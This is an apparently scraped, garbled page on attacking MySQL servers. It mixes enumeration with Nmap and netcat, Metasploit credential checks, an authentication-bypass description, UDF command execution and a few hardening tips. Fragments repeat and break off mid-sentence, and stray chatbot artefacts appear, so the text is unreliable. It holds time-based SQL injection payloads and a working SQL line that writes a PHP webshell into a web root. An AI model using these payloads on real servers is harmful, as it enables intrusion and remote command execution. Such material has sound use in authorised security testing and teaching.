If default credentials do not work, the next phase involves auditing password strength. MySQL uses its own authentication handshake protocol, making specific tooling necessary. Metasploit Auxiliary Modules
Prevent remote exposure by ensuring bind-address = 127.0.0.1 is set in the my.cnf configuration file. Use SSH tunneling if remote administration is required.
: It frequently links to and explains the use of industry-standard tools like sqlmap for automated testing.
MySQL traditionally listens on TCP port 3306. However, obfuscated environments may host it on non-standard ports. A standard Nmap service scan is the quickest way to confirm the service footprint: nmap -sV -sC -p 3306 Use code with caution. mysql hacktricks verified
: Using MySQL's capability to write binary data to gain Remote Code Execution.
If the port is open, you can manually grab the MySQL handshake banner using netcat or telnet . This often reveals the exact sub-version (e.g., 8.0.25-0ubuntu0.20.04.1 ), giving you immediate insight into potential CVEs. nc -nv 3306 Use code with caution. Nmap NSE Scripts
In specific legacy versions of MySQL (and MariaDB), a flaw in the library checking the token returned by the client allowed users to authenticate without the correct password. If a user authenticates repeatedly, there is a 1-in-256 chance that the check passes. You can verify this vulnerability using a rapid bash loop: If default credentials do not work, the next
Maliciously loaded UDFs can be used to execute OS-level commands if the plugin directory is writable.
You can drop a web shell or a malicious payload onto the server using INTO OUTFILE or INTO DUMPFILE .
In certain conditions, you might need to write binary data to the file system. HackTricks provides direct methods for this using conversion functions: Use SSH tunneling if remote administration is required
Use auxiliary/scanner/mysql/mysql_login to validate existing credentials.
' AND (SELECT 1 FROM dual W ' PAGE.php?id=1 AND SLEEP(5)-- - 4. File System Interactivity
-- Write a PHP webshell (if secure_file_priv permits) SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';